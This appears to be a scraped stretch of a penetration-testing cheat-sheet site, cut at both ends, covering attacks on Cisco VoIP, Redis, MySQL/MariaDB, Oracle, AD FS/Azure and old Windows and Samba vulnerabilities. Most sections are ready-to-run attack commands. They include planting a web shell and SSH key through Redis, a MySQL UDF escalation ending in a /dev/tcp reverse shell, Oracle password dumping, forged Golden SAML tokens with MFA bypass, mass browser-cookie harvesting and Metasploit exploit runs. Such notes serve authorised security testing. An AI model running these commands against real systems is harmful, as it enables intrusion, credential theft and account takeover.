'https://cucm01.megacorp.local:8443/cucm-uds/users?lastName=' | grep -oP '.*?.*?' | sort -u | tee cucm_users.txt Enumerate credential leaks on Cisco IP Phones: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip#vlan-hopping-on-cisco-voice) VLAN Hopping on Cisco Voice * [https://savvyadmin.com/vlan-hopping-on-cisco-voice-enabled-switch-ports/](https://savvyadmin.com/vlan-hopping-on-cisco-voice-enabled-switch-ports/) Capture the first CDP advertisement while plugged through the phone: Relay it once a minute to simulate a legit phone device: Configure a sub-interface to access the voice VLAN: Last updated 3 years ago * [Cisco IP Phones](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip#cisco-ip-phones) * [VLAN Hopping on Cisco Voice](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip#vlan-hopping-on-cisco-voice) Copy $ python3 iCULeak.py -nA -c CUCM01.megacorp.local -l phones.txt 192.168.1.11 Or $ for i in `cat phones.txt`; do curl -s http://cucm01.megacorp.local:6970/$i.cnf.xml | grep -i pass; done Copy $ sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc $ sudo tcpdump -vr cdp-packet.cap Copy $ sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap" Copy $ sudo vconfig add eth0 1337 $ sudo ifconfig eth0.1337 up $ sudo dhclient -v eth0.1337 --- # Sniff Traffic | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#tcpdump) tcpdump ---------------------------------------------------------------------------------------------- * [http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/home](http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/home) Linux (while connected via SSH): Copy $ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' & Windows: Copy $ wget 'http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812' $ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap' $ sleep 30m [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#wireshark) Wireshark -------------------------------------------------------------------------------------------------- * [https://wiki.wireshark.org/CaptureSetup/CapturePrivileges](https://wiki.wireshark.org/CaptureSetup/CapturePrivileges) * [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#filters) Filters Protocols to consider: * [DTP](https://en.wikipedia.org/wiki/Dynamic_Trunking_Protocol) (Dynamic Trunking Protocol) * [OSPF](https://en.wikipedia.org/wiki/Open_Shortest_Path_First) (Open Shortest Path First) * [SSDP](https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol) (Simple Service Discovery Protocol) * [ARP](https://en.wikipedia.org/wiki/Address_Resolution_Protocol) (Address Resolution Protocol) * [LLMNR](https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution) (Link-Local Multicast Name Resolution) * [NBNS](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP) (NetBIOS Name Service) * [mDNS](https://en.wikipedia.org/wiki/Multicast_DNS) (Multicast DNS) * [ICMPv6](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol_for_IPv6) (Internet Control Message Protocol version 6) * [DHCPv6](https://en.wikipedia.org/wiki/DHCPv6) (Dynamic Host Configuration Protocol version 6) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#scapy) Scapy ------------------------------------------------------------------------------------------ * [https://gist.github.com/Dfte/9cfeb87892557fd098de78f68b1b1390](https://gist.github.com/Dfte/9cfeb87892557fd098de78f68b1b1390) Passively detect live subnets: Last updated 5 months ago * [tcpdump](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#tcpdump) * [Wireshark](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#wireshark) * [Filters](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#filters) * [Scapy](https://ppn.snovvcra.sh/pentest/infrastructure/networks/sniff-traffic#scapy) Copy dtp || ospf || ssdp || arp || llmnr || nbns || mdns || icmpv6 || dhcpv6 Copy $ sudo python3 SilentListener.py -i eth0 -o ranges.txt [--scan] --- # Redis | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis.md) . * [https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html](https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html) * [2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf) * [https://github.com/holys/redis-cli/releases](https://github.com/holys/redis-cli/releases) * [https://github.com/antirez/redis](https://github.com/antirez/redis) Check for anonymous login: Copy $ nc 127.0.0.1 6379 Escape character is '^]'. echo "Hey, no AUTH required!" $21 Hey, no AUTH required! quit +OK Connection closed by foreign host. Sensitive injection points for testing: Copy /var/www/html /home/redis/.ssh /var/lib/redis/.ssh /var/spool/cron/crontabs /var/spool/cron $ for dname in `cat dirs.txt`; do redis-cli -h 127.0.0.1 config set dir $dname | grep OK && echo $dname; done [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis#web-shell) Web Shell -------------------------------------------------------------------------------------- * [https://book.hacktricks.xyz/pentesting/6379-pentesting-redis](https://book.hacktricks.xyz/pentesting/6379-pentesting-redis) [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis#ssh-public-key) SSH Public Key ------------------------------------------------------------------------------------------------ * [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) Last updated 4 years ago * [Web Shell](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis#web-shell) * [SSH Public Key](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis#ssh-public-key) Copy $ redis-cli -h 127.0.0.1 flushall $ redis-cli -h 127.0.0.1 set pwn '' $ redis-cli -h 127.0.0.1 config set dbfilename shell.php $ redis-cli -h 127.0.0.1 config set dir /var/www/html $ redis-cli -h 127.0.0.1 save Copy $ ssh-keygen -t ecdsa -s 521 -f key $ (echo -e "\n\n"; cat key.pub; echo -e "\n\n") > key.txt $ redis-cli -h 127.0.0.1 flushall $ cat foo.txt | redis-cli -h 127.0.0.1 -x set pwn $ redis-cli -h 127.0.0.1 config set dbfilename authorized_keys $ redis-cli -h 127.0.0.1 config set dir /var/lib/redis/.ssh $ redis-cli -h 127.0.0.1 save --- # MySQL / MariaDB | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mysql-mariadb.md) . Basic CLI syntax: Copy $ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;' Basic enumeration: Copy mysql> show GRANTS; mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir; [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mysql-mariadb#udf-privesc) UDF PrivEsc -------------------------------------------------------------------------------------------------- * [https://www.exploit-db.com/exploits/1518](https://www.exploit-db.com/exploits/1518) * [https://github.com/mysqludf/lib\_mysqludf\_sys](https://github.com/mysqludf/lib_mysqludf_sys) * [https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9](https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9) Install dependencies: Copy $ sudo apt install libmariadbclient-dev -y $ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys Compile `.so` library (x86 example): Copy $ sudo apt install libc6-dev-i386 -y $ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6 Compile `.so` library (x64 example): Copy $ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6 Convert library to hex: Load library and call user-defined `sys_exec` function with a rev-shell. MySQL (x86 example): MariaDB (x64 example): Last updated 4 years ago Copy $ xxd -p lib_mysqludf_sys.so | tr -d '\n' Copy mysql> use mysql; mysql> create table pwn(line blob); mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so')); mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so'; Or load it from hex: mysql> set @pwn = '7F..00'; mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so'; mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'"); Copy MariaDB> show variables like '%plugin%'; # get lib path MariaDB> use mysql; MariaDB> create table pwn(line blob); MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so')); MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so'; Or load it from hex: MariaDB> set @pwn = 0x7F..00; MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so'; MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so'; MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'"); --- # Oracle | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle.md) . * [https://xakep.ru/2015/04/07/195-oracle-db/](https://xakep.ru/2015/04/07/195-oracle-db/) * [https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf](https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf) * [https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener](https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener) * [http://www.red-database-security.com/wp/oracle\_cheat.pdf](http://www.red-database-security.com/wp/oracle_cheat.pdf) [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle#odat) odat ----------------------------------------------------------------------------- * [https://github.com/quentinhardy/odat/releases](https://github.com/quentinhardy/odat/releases/) * [https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests](https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests) Install manually (depreciated): * [https://github.com/quentinhardy/odat#installation-optional-for-development-version](https://github.com/quentinhardy/odat#installation-optional-for-development-version) Copy $ git clone https://github.com/quentinhardy/odat ~/tools/odat && cd ~/tools/odat $ git submodule init && git submodule update $ sudo apt install libaio1 python3-dev alien python3-pip $ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm $ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-devel-19.6.0.0.0-1.x86_64.rpm $ sudo alien --to-deb *.rpm $ sudo dpkg -i *.deb $ vi /etc/profile ... export ORACLE_HOME=/usr/lib/oracle/19.6/client64/ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib export PATH=${ORACLE_HOME}bin:$PATH ... $ pip3 install cx_Oracle $ python3 odat.py -h Code execution: Passwords dumping: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle#tns-poison) TNS Poison * [http://www.joxeankoret.com/download/tnspoison.pdf](http://www.joxeankoret.com/download/tnspoison.pdf) Check with Nmap: Brute SID with MSF: Brute SID with odat: Exploit with odat: * [https://github.com/quentinhardy/odat/wiki/tnspoison](https://github.com/quentinhardy/odat/wiki/tnspoison) Last updated 1 year ago * [odat](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle#odat) * [TNS Poison](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/oracle#tns-poison) Copy $ odat dbmsscheduler -s 10.10.13.37 -p 1521 -d -U sys -P 'Passw0rd!' --sysdba --exec '/usr/bin/python /tmp/1.py' Copy $ odat passwordstealer -s 10.10.13.37 -p 1521 -d -U sys -P 'Passw0rd!' --sysdba --get-passwords Copy $ sudo wget https://gist.githubusercontent.com/JukArkadiy/3d6cff222d1b87e963e7/raw/fbe6fe17a9bca6ce839544b7afb2276fff061d46/oracle-tns-poison.nse -O /usr/share/nmap/scripts/oracle-tns-poison.nse $ sudo nmap -v -n -Pn -sV --script oracle-tns-poison.nse -oA CVE-2014-0160/nmap/tns-poison -p1521 10.10.13.37 Copy msf > use auxiliary/scanner/oracle/sid_brute msf > set RHOSTS file:oracle.txt msf > set THREADS 25 msf > set VERBOSE false msf > run Copy $ odat sidguesser -s 10.10.13.37 -p 1521 Copy $ odat tnspoison -s 10.10.13.37 -d --test-module $ odat tnspoison -s 10.10.13.37 -d --poison --- # Atlassian | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/atlassian.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/atlassian#jira) Jira ---------------------------------------------------------------------------------- * [https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting](https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting) Last updated 2 years ago --- # On-Prem → Cloud | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md) . * [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) * [https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/) * [https://nullg0re.com/2024/05/cracking-zero-trust-on-prem-to-azure-pivots-with-responder-and-evilginx2/](https://nullg0re.com/2024/05/cracking-zero-trust-on-prem-to-azure-pivots-with-responder-and-evilginx2/) [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#dumping-aad-connect-creds) Dumping AAD Connect Creds ------------------------------------------------------------------------------------------------------------------------------------------------ * [https://dirkjanm.io/updating-adconnectdump-a-journey-into-dpapi/](https://dirkjanm.io/updating-adconnectdump-a-journey-into-dpapi/) * [https://aadinternals.com/post/adsync/](https://aadinternals.com/post/adsync/) * [https://imphash.medium.com/shooting-up-on-prem-to-cloud-detecting-aadconnect-creds-dump-422b21128729](https://imphash.medium.com/shooting-up-on-prem-to-cloud-detecting-aadconnect-creds-dump-422b21128729) * [https://rioasmara.com/2020/07/07/azure-ad-connect-post-exploitation-for-dcsync/](https://rioasmara.com/2020/07/07/azure-ad-connect-post-exploitation-for-dcsync/) * [\[PDF\] Hacking Azure AD via Active Directory (Dirk-jan Mollema, @\_dirkjan)](https://dirkjanm.io/assets/raw/TR19-Im%20in%20your%20cloud.pdf) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#tools) Tools * [https://github.com/dirkjanm/adconnectdump](https://github.com/dirkjanm/adconnectdump) * [https://github.com/Hagrid29/DumpAADSyncCreds](https://github.com/Hagrid29/DumpAADSyncCreds) [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#forging-a-d-fs-saml-tokens-golden-saml) Forging AD FS SAML Tokens (Golden SAML) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * [https://aadinternals.com/post/adfs/](https://aadinternals.com/post/adfs/) * [https://github.com/Gerenios/AADInternals/tree/ff0d29fd77cbcb32ce2a1837a1d94d8be0be8466](https://github.com/Gerenios/AADInternals/tree/ff0d29fd77cbcb32ce2a1837a1d94d8be0be8466) * [https://github.com/Azure/SimuLand/blob/main/docs/labs/GoldenSAML/simulation/export-adfs-dkm-key/exportADFSDKMKeyDRS.md](https://github.com/Azure/SimuLand/blob/main/docs/labs/GoldenSAML/simulation/export-adfs-dkm-key/exportADFSDKMKeyDRS.md) * [https://github.com/mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) * [https://github.com/mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) Install AADInternals v0.9.3: Check if Azure is configured as a party trust: Get AD FS config: Get private key object GUID: Ensure you have enough privileges to DCSync: DCSync the key: We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so `$Credentials` ([here](https://github.com/Gerenios/AADInternals/blob/49a9659b60672f08428e72148b66dfe4629562da/DRS_Utils.ps1#L242) , `C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3\DRS_Utils.ps1`) can be omitted. Generate the token signing certificate: Get AD FS trust issuer as well as on-prem users' immutable cloud IDs: Generate forged SAML request-response for WS-Federation (SOAP-based) protocol interchange: Generate forged SAML request-response for SAML 2.0 (XML-based) protocol interchange: Generate forged SAML request-response, impersonate and login: [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#pass-the-cookie) Pass-the-Cookie ---------------------------------------------------------------------------------------------------------------------------- * [https://blog.netwrix.com/2022/11/29/bypassing-mfa-with-pass-the-cookie-attack/](https://blog.netwrix.com/2022/11/29/bypassing-mfa-with-pass-the-cookie-attack/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#refresh-token-from-estsauth-cookies) Refresh Token from ESTSAuth\* Cookies Automated with [TokenTacticsV2](https://github.com/f-bader/TokenTacticsV2?tab=readme-ov-file#get-a-refresh-token-from-estsauth-cookie) : ### [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#mass-cookies-harvesting) Mass Cookies Harvesting Collect with [dploot](https://github.com/zblurx/dploot) and decrypt with a backup key (similar to [HEKATOMB](https://github.com/ProcessusT/HEKATOMB) ): Search for `ESTSAUTHPERSISTENT` cookies: [](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#mass-hidden-directories-searching) Mass Hidden Directories Searching ---------------------------------------------------------------------------------------------------------------------------------------------------------------- Impacket's **smbclient.py** extension (searches for hidden directories in every user's home): Collect hidden directories: Search for hidden directories that start with `.az`: Last updated 1 year ago * [Dumping AAD Connect Creds](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#dumping-aad-connect-creds) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#tools) * [Forging AD FS SAML Tokens (Golden SAML)](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#forging-a-d-fs-saml-tokens-golden-saml) * [Pass-the-Cookie](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#pass-the-cookie) * [Refresh Token from ESTSAuth\* Cookies](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#refresh-token-from-estsauth-cookies) * [Mass Cookies Harvesting](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#mass-cookies-harvesting) * [Mass Hidden Directories Searching](https://ppn.snovvcra.sh/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud#mass-hidden-directories-searching) Copy PS > Install-Module -Name "AADInternals" -RequiredVersion "0.9.3" -Force PS > Import-Module -Name "AADInternals" -RequiredVersion "0.9.3" -Force Copy PS > Install-WindowsFeature ADFS-Federation PS > Import-Module ADFS ADFS > Get-ADFSRelyingPartyTrust | select Identifier | fl Copy AADInt > $ADFSConfig = Export-AADIntADFSConfiguration -Hash -SID -Server ADFS01.megacorp.local PS > [xml]$xml=$ADFSConfig PS > $group = $xml.ServiceSettingsData.PolicyStore.DkmSettings.Group PS > $container = $xml.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName PS > $parent = $xml.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn PS > $base = "LDAP://CN=$group,$container,$parent" PS > $base Copy PV3 > Get-DomainObject -LDAPFilter "(&(objectclass=contact)(!name=CryptoPolicy)(ThumbnailPhoto=*))" -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=megacorp,DC=local" | select objectGuid Copy Cmd > Rubeus.exe asktgt /user:DC01$ /domain:megacorp.local /dc:DC01.megacorp.local /aes256: /opsec /nowrap /ptt Cmd > Rubeus.exe asktgs /ticket: /domain:megacorp.local /dc:DC01.megacorp.local /service:LDAP/DC01.megacorp.local /nowrap /ptt Copy AADInt > $ADFSKey = Export-AADIntADFSEncryptionKey -Server DC01.megacorp.local -ObjectGuid -Credentials "dummy" PS > [System.BitConverter]::ToString($ADFSKey) Copy AADInt > Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $ADFSKey PS > ls ADFS_* Copy ADFS > $Issuer = (Get-ADFSProperties).Identifier.OriginalString PV3 > Get-DomainUser | select UserPrincipalname, @{Name="ImmutableId"; Expression={"$([Convert]::ToBase64String(([guid]$_.ObjectGuid).ToByteArray()))"}} Copy AADInt > $token = New-AADIntSAMLToken -ImmutableId -PfxFileName .\ADFS_signing.pfx -Issuer $Issuer [-UPN j.doe@megacorp.com] [-ByPassMFA] AADInt > New-WSFedResponse -SAMLToken $token Copy AADInt > $token = New-AADIntSAML2Token -ImmutableId -PfxFileName .\ADFS_signing.pfx -Issuer $Issuer [-UPN j.doe@megacorp.com] AADInt > $resp = New-AADIntSAMLPResponse -SAML2Token $token AADInt > [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($resp)) Copy AADInt > Open-AADIntOffice365Portal -TokenType WSFED/SAMLP -ImmutableId -PfxFileName .\ADFS_signing.pfx -Issuer $Issuer [-UPN j.doe@megacorp.com] [-ByPassMFA] [-Browser Chrome] Copy PS > Get-AzureTokenFromESTSCookie -ESTSAuthCookie Copy $ ls tickets/ SRV01.ccache SRV02.ccache PC01.ccache $ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 dploot browser -d megacorp.local -no-pass -use-kcache "$comp.megacorp.local" -pvk ../key.pvk -show-cookies > "browsers_$comp.out"; done Copy $ grep -nr --include '*.out' ESTSAUTHPERSISTENT -A3 | grep -e Creation -e Expires Copy def do_hidden(self, args=None): hidden = [] for item1 in self.smb.listPath(self.share, '\\Users\\*'): longname1 = item1.get_longname() if item1.is_directory() and longname1 not in ('.', '..'): dir0 = ntpath.join('\\Users', longname1) try: ls = self.smb.listPath(self.share, ntpath.join(dir0, '*')) except: continue else: for item2 in ls: longname2 = item2.get_longname() if item2.is_directory() and longname2 not in ('.', '..') and longname2.startswith('.'): hidden.append((item2, ntpath.join(dir0, longname2))) result = '' for item, name in hidden: result += 'drw-rw-rw- ' result += f'{datetime.fromtimestamp(item.get_mtime_epoch()).strftime("%Y/%m/%d %H:%M:%S"):>21} ' result += ' ' result += name result += '\n' print(result.strip()) Copy $ ls tickets/ SRV01.ccache SRV02.ccache PC01.ccache $ echo 'use c$\ninfo\nhidden' > cmd $ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done Copy $ grep -nr --include '*.out' '\Users' | grep -i '\.az' --- # Low-Hanging Fruits | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#net_api) net\_api ------------------------------------------------------------------------------------------- **CVE-2008-4250, MS08-067** Check: Copy $ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445 Or msf > use exploit/windows/smb/ms08_067_netapi msf > set RHOSTS file:smb.txt msf > check Exploit: Copy msf > use exploit/windows/smb/ms08_067_netapi msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#eternalblue) EternalBlue -------------------------------------------------------------------------------------------------- **CVE-2017-0144, MS17-010** ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#unauthenticated-fuzzbunch--wine) Unauthenticated (FuzzBunch + Wine) * [https://github.com/fuzzbunch/fuzzbunch](https://github.com/fuzzbunch/fuzzbunch) * [https://github.com/nopernik/fuzzbunch\_wrapper](https://github.com/nopernik/fuzzbunch_wrapper) * [https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956](https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956) * [https://habr.com/ru/post/327490/](https://habr.com/ru/post/327490/) * [https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/](https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#authenticated-windows-2003-or-r-w-pipe) Authenticated (Windows 2003 or R/W Pipe) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#msf) MSF Check: Exploit with: **EternalRomance / EternalSynergy / EternalChampion** Exploit with `ms17_010_psexec`: Exploit with `ms17_010_command`: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#manually) Manually * [https://github.com/helviojunior/MS17-010](https://github.com/helviojunior/MS17-010) * [https://github.com/jdiazmx/MS17-010\_WORAWIT](https://github.com/jdiazmx/MS17-010_WORAWIT) * [https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010) Send MSF payload and execute it with `send_and_execute.py`: Or just execute commands on host via `zzz_exploit.py` (at least one named pipe must be accessible on target): For x86 EternalBlue shellcodes use [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) (very unstable). A feature for grabbing registry secrets in one shot: [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#sambacry) SambaCry -------------------------------------------------------------------------------------------- **CVE-2017-7494** (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#msf-1) MSF ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#manually-1) Manually * [https://github.com/opsxcq/exploit-CVE-2017-7494](https://github.com/opsxcq/exploit-CVE-2017-7494) * [https://github.com/joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494) Compile `.so` SUID shared library: Get real share path on the target's filesystem: Upload `pwn.so` to target and then run the exploit: [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#bluekeep) BlueKeep -------------------------------------------------------------------------------------------- **CVE-2019-0708** Check: Exploit: [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#printnightmare) PrintNightmare -------------------------------------------------------------------------------------------------------- **CVE-2021-16751, CVE-2021-34527** * [https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) * [https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/](https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/) * [https://itm4n.github.io/printnightmare-exploitation/](https://itm4n.github.io/printnightmare-exploitation/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#check) Check #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#crackmapexec) CrackMapExec * [https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py](https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#itwasalladream) ItWasAllADream * [https://github.com/byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#exploit) Exploit #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#c-c) C/C++ RCE (fork of the original repo): * [https://github.com/afwu/PrintNightmare](https://github.com/afwu/PrintNightmare) LPE: * [https://github.com/hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#python) Python RCE: * 